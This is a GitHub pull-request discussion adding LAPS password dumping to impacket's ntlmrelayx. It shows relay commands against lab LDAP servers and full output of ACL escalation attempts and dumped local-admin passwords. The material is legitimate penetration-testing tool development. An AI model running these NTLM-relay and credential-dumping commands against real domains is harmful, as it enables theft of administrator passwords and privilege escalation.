Added LAPS Dumping Support

praetorian-adam-crosser opened the pull request:
Added support to ntlmrelayx to support dumping LAPS passwords and writing them to a file when relaying HTTP -> LDAP traffic. This functionality is useful in scenarios where it is possible to e.g., relay a member of "Account Operators" as, by default, this account has read access to stored LAPS passwords.

0xdeaddood commented:
Hi @praetorian-adam-crosser! I tested the PR and works great. Would it be possible to add some messages to inform whether the dump was successful or not?

0xdeaddood commented:
Hey @praetorian-adam-crosser! Just one more thing, what options are you using to dump the passwords? I'm using this command:

`ntlmrelayx.py -t ldaps://servidor.ejemplo.com --dump-laps --no-validate-privs`

If it's necessary to run the command with the flag _--no-validate-privs_ ,maybe it would be great to modify the value of 'validateprivs' to 'false' when _--dumps-laps_ is selected.

praetorian-adam-crosser commented:
Hi @0xdeaddood! Thank you for taking the time to review my pull request. The "--no-validate-privs" argument is not required to dump the LAPS passwords. In my lab I'm using the command `sudo python3 examples/ntlmrelayx.py -t ldap://192.168.184.154 --dump-laps -debug`. Please let me know if this works for you in your lab environment as well.

Regarding your first question if you run with the -debug flag it will print to stdout the dumped passwords. Regardless of if the -debug flag is set the program will write the relayed user credentials to a file named "laps-dump-$username" where $username is the name of the user whose account credentials were relayed.

I can work to add an additional output that will be displayed indicating if the attack was successful without printing out the passwords to indicate if the attack was successful for a given relayed user account and if so print out the number of credentials read successfully. Below are my proposed success and failure messages:

`[+] Successfully dumped %d LAPS passwords through relayed account %s"`

and

`[-] The relayed user %s does not have permissions to read any LAPS passwords`

From my usage of the tool on a recent engagement I've also found the solution of creating an output file and then deleting if the user doesn't have read access to any LAPS passwords doesn't work well when there are hundreds of repeated auths to the relay tool a second (e.g. as a result of ADIDNS poisoning with a wild card entry) so I can update this as well.

This will result in the following additions:
* A success/failure message will be printed to indicate the status of the relay for a particular user account
* An output file will not be created until parsing the search results produces at least one readable LAPS password.

Do you have any thoughts on additional changes or updates that could be made?

praetorian-adam-crosser commented:
Hey @0xdeaddood! I added error/success messages and fixed the output file creation issue. Output files are now only created when the user has read access to one or more LAPS passwords to avoid weird issues with lots of connection attempts. I also identified an issue where if you ran e.g. `sudo python3 examples/ntlmrelayx.py -t ldap://192.168.184.154 --dump-laps -debug` and a DA authenticated it would try to escalate privileges using ACLs, however, if this failed (e.g. due to connecting over LDAP:// instead of LDAPS://) it would exit before attempting to dump LAPS passwords.

The expected behavior in my opinion is that it should attempt to escalate using ACLs and regardless of success/failure it should also attempt to dump any readable LAPS passwords (as an attacker I'm always fine with more access or credentials ^^). Below is an output when a DA authentication is relayed and ACL privileged escalation fails due to the LDAP connection not being encrypted.

```
[+] Permission found: Full Control on OU=ADMINISTRATORS,DC=TESTLAB,DC=LOCAL; Reason: GENERIC_ALL via CN=Domain Admins,CN=Users,DC=TESTLAB,DC=LOCAL
[+] Permission found: Full Control on OU=Domain Controllers,DC=TESTLAB,DC=LOCAL; Reason: Owner via CN=Domain Admins,CN=Users,DC=TESTLAB,DC=LOCAL
[+] Permission found: Full Control on CN=Users,DC=TESTLAB,DC=LOCAL; Reason: Owner via CN=Domain Admins,CN=Users,DC=TESTLAB,DC=LOCAL
[+] Permission found: Full Control on CN=Enterprise Admins,CN=Users,DC=TESTLAB,DC=LOCAL; Reason: Owner via CN=Domain Admins,CN=Users,DC=TESTLAB,DC=LOCAL
[*] User privileges found: Create user
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[+] Performing ACL attack
[*] Attempting to create user in: CN=Users,DC=TESTLAB,DC=LOCAL
[-] Failed to add a new user. The server denied the operation. Try relaying to LDAP with TLS enabled (ldaps) or escalating an existing user.
[-] Unable to escalate without a valid user.
[+] Performing Group attack
[*] Attempting to create user in: CN=Users,DC=TESTLAB,DC=LOCAL
[-] Failed to add a new user. The server denied the operation. Try relaying to LDAP with TLS enabled (ldaps) or escalating an existing user.
[-] Unable to escalate without a valid user, aborting.
[*] Attempting to dump LAPS passwords
[+] DN:CN=WIN-JBB4AGSAI1T,OU=Domain Controllers,DC=TESTLAB,DC=LOCAL
[+] Password:&Tt!j69b2Tf2%u
[+] DN:CN=MSEDGEWIN10,CN=Computers,DC=TESTLAB,DC=LOCAL
[+] Password:9u8#4dEO92m1RE
[*] Successfully dumped 2 LAPS passwords through relayed account TEST
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!
```
Here is an example of relaying a user in account operators with the output given below.
```
[*] Authenticating against ldap://192.168.184.154 as TESTLAB\ACNTOP SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: [DN: CN=Account Operators,CN=Builtin,DC=TESTLAB,DC=LOCAL - STATUS: Read - READ TIME: 2020-02-06T15:29:47.707470
    name: Account Operators
    objectSid: S-1-5-32-548
]
[+] User is a member of: [DN: CN=Domain Users,CN=Users,DC=TESTLAB,DC=LOCAL - STATUS: Read - READ TIME: 2020-02-06T15:29:47.711738
    distinguishedName: CN=Domain Users,CN=Users,DC=TESTLAB,DC=LOCAL
    name: Domain Users
    objectSid: S-1-5-21-3300462668-3857524160-2988809723-513
]
[+] Permission found: Create users in OU=_GROUPS,OU=ADMINISTRATORS,DC=TESTLAB,DC=LOCAL; Reason: Granted to CN=Account Operators,CN=Builtin,DC=TESTLAB,DC=LOCAL
[+] Permission found: Create users in OU=ADMINISTRATORS,DC=TESTLAB,DC=LOCAL; Reason: Granted to CN=Account Operators,CN=Builtin,DC=TESTLAB,DC=LOCAL
[+] Permission found: Create users in CN=Users,DC=TESTLAB,DC=LOCAL; Reason: Granted to CN=Account Operators,CN=Builtin,DC=TESTLAB,DC=LOCAL
[*] User privileges found: Create user
[*] Attempting to dump LAPS passwords
[+] DN:CN=MSEDGEWIN10,CN=Computers,DC=TESTLAB,DC=LOCAL
[+] Password:9u8#4dEO92m1RE
[*] Successfully dumped 1 LAPS passwords through relayed account ACNTOP
```

Below is an example behavior when relaying an account credential that doesn't have the ability to relay any LAPS passwords. You can see that a message now states "The relayed user JOHN.SMITH does not have permissions to read any LAPS passwords"

```
[*] HTTPD: Client requested path: /test
[*] Authenticating against ldap://192.168.184.154 as TESTLAB\john.smith SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: []
[+] User is a member of: [DN: CN=Domain Users,CN=Users,DC=TESTLAB,DC=LOCAL - STATUS: Read - READ TIME: 2020-02-06T15:28:01.024734
    distinguishedName: CN=Domain Users,CN=Users,DC=TESTLAB,DC=LOCAL
    name: Domain Users
    objectSid: S-1-5-21-3300462668-3857524160-2988809723-513
]
[*] Attempting to dump LAPS passwords
[*] The relayed user JOHN.SMITH does not have permissions to read any LAPS passwords
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!
```

The contents of the generated LAPS dump files for the associated ("TEST" - DA User) and ("ACNTOP" - account operators user) are given below. My current theory why the account operators user doesn't have read access to the LAPS attribute on a DC is because of the Admin SD Holder service enforcing stronger permissions on the object.

```
user@lab:~/Desktop/impacket$ cat laps-dump-TEST-99338 
DN:CN=WIN-JBB4AGSAI1T,OU=Domain Controllers,DC=TESTLAB,DC=LOCAL
Password:&Tt!j69b2Tf2%u
DN:CN=MSEDGEWIN10,CN=Computers,DC=TESTLAB,DC=LOCAL
Password:9u8#4dEO92m1RE
user@lab:~/Desktop/impacket$ cat laps-dump-ACNTOP-46143
DN:CN=MSEDGEWIN10,CN=Computers,DC=TESTLAB,DC=LOCAL
Password:9u8#4dEO92m1RE
user@lab:~/Desktop/impacket$
```

0xdeaddood commented:
Hi @praetorian-adam-crosser! It looks great. Let me check it and I''ll get back to you shortly.

asolino commented:
Hey @praetorian-adam-crosser Thanks for the PR and further additions. Thanks @0xdeaddood for verification. Merging now.
